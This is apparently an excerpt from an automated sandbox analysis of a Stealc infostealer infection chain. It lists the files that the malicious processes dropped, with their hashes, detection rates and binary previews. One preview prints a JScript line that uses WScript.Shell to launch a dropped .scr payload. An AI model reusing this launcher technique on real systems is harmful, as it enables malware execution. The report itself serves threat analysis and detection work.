                                                                                                                                                                          Preview:.p.S.....................................;...{.."....|..42...{5.........42...{5.42...{5...Y.42...{59.................V@("....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):697182
                                                                                                                                                                          Entropy (8bit):5.235404019605756
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:3BXiKZWAAllNJheaP7Qata8PtcV3w6F6BM/vWjfLDxqq6A+kmfDUhbpEj2DDp010:V+
                                                                                                                                                                          MD5:2C2526C77A837733638AFFC95875AFAF
                                                                                                                                                                          SHA1:0037979EA218CA810E304B1AD3C7D6DD10087D06
                                                                                                                                                                          SHA-256:4EC6CA07A541564B4CC5EBB43A07FA270004550A08685058D56BA90700A2EB7D
                                                                                                                                                                          SHA-512:056B57BA9D54FFC6C55649E728148EB2AF6D4154BB13570BB8DBAA6FA0EDE6B0E179220FA93F27B758DECE67A461D4784A6F29B5AB7C4A1B07A6BF7958A19E35
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:....w..B6Tj....X.s.TEe....1aL.&.?..$......,...................4.c.3.a.4.c.b.8.-.a.c.b.f.-.1.9.f.a.-.d.1.7.6.-.d.1.a.a.0.c.9.f.b.9.e.6._...e.t...................................................x.m.l..................z...9.1.a.5.b.4.c.7.-.2.9.a.8.-.e.c.8.0.-.4.3.2.1.-.f.b.e.c.e.a.9.0.6.7.0.5._.t.r.k...................................................x.m.l...h.......h...........f.d.2.d.4.f.f.f.-.b.a.2.c.-.9.3.c.6.-.8.8.b.9.-.8.7.1.8.4.3.d.d.1.9.e.9._.........................................................x.m.l...........@...........e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.m.e.t...................................................x.m.l...........h.......t...e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.t.r.k...................................................x.m.l...B...................1.8.8.0.0.6.f.c.-.d.8.8.5.-.b.0.c.b.-.e.4.8.c.-.f.1.c.4.e.d.6.0.a.2.b.6._.........................................................x.m.l...........
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):697182
                                                                                                                                                                          Entropy (8bit):5.235404019605756
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:3BXiKZWAAllNJheaP7Qata8PtcV3w6F6BM/vWjfLDxqq6A+kmfDUhbpEj2DDp010:V+
                                                                                                                                                                          MD5:2C2526C77A837733638AFFC95875AFAF
                                                                                                                                                                          SHA1:0037979EA218CA810E304B1AD3C7D6DD10087D06
                                                                                                                                                                          SHA-256:4EC6CA07A541564B4CC5EBB43A07FA270004550A08685058D56BA90700A2EB7D
                                                                                                                                                                          SHA-512:056B57BA9D54FFC6C55649E728148EB2AF6D4154BB13570BB8DBAA6FA0EDE6B0E179220FA93F27B758DECE67A461D4784A6F29B5AB7C4A1B07A6BF7958A19E35
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:....w..B6Tj....X.s.TEe....1aL.&.?..$......,...................4.c.3.a.4.c.b.8.-.a.c.b.f.-.1.9.f.a.-.d.1.7.6.-.d.1.a.a.0.c.9.f.b.9.e.6._...e.t...................................................x.m.l..................z...9.1.a.5.b.4.c.7.-.2.9.a.8.-.e.c.8.0.-.4.3.2.1.-.f.b.e.c.e.a.9.0.6.7.0.5._.t.r.k...................................................x.m.l...h.......h...........f.d.2.d.4.f.f.f.-.b.a.2.c.-.9.3.c.6.-.8.8.b.9.-.8.7.1.8.4.3.d.d.1.9.e.9._.........................................................x.m.l...........@...........e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.m.e.t...................................................x.m.l...........h.......t...e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.t.r.k...................................................x.m.l...B...................1.8.8.0.0.6.f.c.-.d.8.8.5.-.b.0.c.b.-.e.4.8.c.-.f.1.c.4.e.d.6.0.a.2.b.6._.........................................................x.m.l...........
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: oZ7nac01Em.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: WGo3ga1AL9.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):999
                                                                                                                                                                          Entropy (8bit):4.966299883488245
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
                                                                                                                                                                          MD5:24567B9212F806F6E3E27CDEB07728C0
                                                                                                                                                                          SHA1:371AE77042FFF52327BF4B929495D5603404107D
                                                                                                                                                                          SHA-256:82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
                                                                                                                                                                          SHA-512:5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):181
                                                                                                                                                                          Entropy (8bit):4.742100137639424
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:RiMIpGXIdPHo55wWAX+d4a+kEkD5iXltLwvHFZo5uWAX+d4a+kEkD5iXltUM:RiJBJHonwWD+vkDQtMHFywWD+vkDQth
                                                                                                                                                                          MD5:6EB11F5D13882A35925C4B6D64D83503
                                                                                                                                                                          SHA1:2D113C2F48122933B501877B5C2D071CB75A3ED4
                                                                                                                                                                          SHA-256:E9CAB2F866683674A4E8BF8854B54EB132A6B931BDDA7066C4A6515C9EA9B1B0
                                                                                                                                                                          SHA-512:B8262B04E3BF2E8238D45814BCD77B03DD66C2EB82944BFA6410D12BD00DFF4FF3EF18411F915805118DA17950F557824729D4529A675A2212758BBE52E77263
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\GreenTech Dynamics\\EcoCraft.scr\" \"C:\\Users\\user\\AppData\\Local\\GreenTech Dynamics\\O\"")
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):893608
                                                                                                                                                                          Entropy (8bit):6.62028134425878
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                                                                          MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                          SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                                                                          SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                                                                          SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):594650
                                                                                                                                                                          Entropy (8bit):7.9996649139256055
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:12288:38tfmUx7zSsIfrhCw5PeXvQXFSSdHDBu4ceeEl2a/uJ2:38hxasKfPeXv4AgHFu4c4l9/Z
                                                                                                                                                                          MD5:4B0812FABC1BA34D8D45D28180F6C75F
                                                                                                                                                                          SHA1:B9D99C00A6F9D5F23E244CC0555F82A7D0EEB950
                                                                                                                                                                          SHA-256:73312C3EA63FAF89E2067E034A9148BF73EFB5140C1BA6A67AAF62170EE98103
                                                                                                                                                                          SHA-512:7F72FFD39F7B66EA701EC642A427C90F9C3EE9BE69A3E431C492BE76AE9A73E8B2B1FBB16553A5A6D8722BAF30B2A392A47C7C998D618459BF398D47D218D158
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:A@2..3Y.....8p.!..L.[...`..b..f^..J....P@....;.:.."....g...Tz.....T%.R.G.....0$.....n.....r0....R-A..z.N..jK...y.....;.EWs.@b....{....Y9p.)J.....s ;..9.j.........X.K..|...e..i...`.c..U.h..%...[..b.....n..:Y....M........W>H.....?..O.[......{...7.....C/.!0..|[&....f.q......}..Q.....+-o.y./T...%..K...vl;4..z*."...k:..2[.v.o..{..c5...%...:..kZU1.J?..TI...!...\3_..&L.[{..4..G>..;.%..'...6.q..2....V_.^.....R...g.......<..%.5.j..3.-.o.aj..............j.8aw.6_e}....Z".WLw"S...,....'..6...P.=..xckw}......b..K..h..ad....m{&h...;.o.yR*..9.....Q..E.b.....2m..E.r.N..8.u.Q4.m..ht.ck.&f.g...$.....3by..B.V1#.G..y..IL.j......2...\..A..^..T.5....+...W=.Z.[.z....X`.&..z.h...B....|xs..H&X..Nv..k.5.s.Z...:~9.V.M.PO&.@..m....P.K......".Ju..?.._:%qp.ON..q.....c.AN$N..-MB.q..-.hz.+..O.B.+<~...f..V..5.C"EY..=D..|.....;.e.|.g.0.^i..f.._e:...0/.....'.[......*...A.1.RY.6}..l.Kf....$.7.N...[ml.W......[.$...p..[H>.+....}.H.....\H2[.'.p......./..z.@...J....*-....
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe
                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1281
                                                                                                                                                                          Entropy (8bit):5.370111951859942
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                                                                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                                                                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                                                                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                                                                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):660480
                                                                                                                                                                          Entropy (8bit):7.64329230449762
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:UuM8OZLrEIC6jejDTN2kNhqqitQ+jHKVkdvXPg9O/1ACWFtIC5NcDU:dI4I50fsYqqitSkxPg41Xgtp5WDU
                                                                                                                                                                          MD5:BDF3C509A0751D1697BA1B1B294FD579
                                                                                                                                                                          SHA1:3A3457E5A8B41ED6F42B3197CFF53C8EC50B4DB2
                                                                                                                                                                          SHA-256:D3948AE31C42FCBA5D9199E758D145FF74DAD978C80179AFB3148604C254BE6D
                                                                                                                                                                          SHA-512:AA81CCBAE9F622531003F1737D22872AE909B28359DFB94813A39D74BDE757141D7543681793102A1DC3DCAECEA27CFFD0363DE8BBB48434FCF8B6DAFEF320B3
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...q. g..........................................@.......................................@.....................................(............................0... ..........................`u......x...................P............................text............................... ..`.rdata..............................@..@.data....1..........................@....00cfg..............................@..@.tls......... ......................@....reloc... ...0..."..................@..B.call........`..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5952512
                                                                                                                                                                          Entropy (8bit):7.874022549731662
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:S1DARPEaQuozISL3R0yFmGPwnvYw9iyiqWAWjuQCmtGlSliMhabgxEA:oFzuCII9CniytWjuQTtASl9hasb
                                                                                                                                                                          MD5:5009B1EF6619ECA039925510D4FD51A1
                                                                                                                                                                          SHA1:22626AA57E21291A995615F9F6BBA083D8706764
                                                                                                                                                                          SHA-256:FBC8C32BF799A005C57540A2E85DD3662ED5795A55F11495F0BA569BBB09DF59
                                                                                                                                                                          SHA-512:2B5BBD9449BE00588058966DB487C0ADFAC764827A6691F6A9FC6C3A770A93BDA11C732D2EB2A3C660697CBC69B1C71A2BF76D2957F65CD2599FB28098B24F14
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............K...........@..........................P........[...@...................................>......`.......................P..\.................................................... 0..............................text....I.......................... ..`.rdata..=%...`......................@..@.data...............................@....vmp.+..*......................... ..`.vmp.+d.... 0.....................@....vmp.+P.X..00...X................. ..`.reloc..\....P......."X.............@..@.rsrc........`.......*X.............@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):2874880
                                                                                                                                                                          Entropy (8bit):6.557349853737172
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:KB88yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy4:KBrWV0C6DVlt8HeUjoT7gH
                                                                                                                                                                          MD5:DA2EA6B51A3216E065B2CED231C9E57F
                                                                                                                                                                          SHA1:EE7EA72BD395654CB1126D9445A130B9BCBC21F0
                                                                                                                                                                          SHA-256:55A539C066DCCA8B451445A6BC712FED79B4984297E86E629FBB74E50256FA8E
                                                                                                                                                                          SHA-512:7C72F9DCF959DE9F012DD06841F6E3DEFA892A5F3AB5ED20A667D4FAC0C613B8E5CE34699590D720FD7A38FB7F62FFC7DC77AA027713FAD558EB84F371A49ABB
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J........................@.......................... /.......+...@.................................T...h.......@........................................................................................................... . .........~..................@....rsrc...@...........................@....idata ............................@...wjqxmzgq.0)......$).................@...xobrrexd..............+.............@....taggant.0......."....+.............@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):334848
                                                                                                                                                                          Entropy (8bit):6.761223756666625
                                                                                                                                                                          Encrypted:false
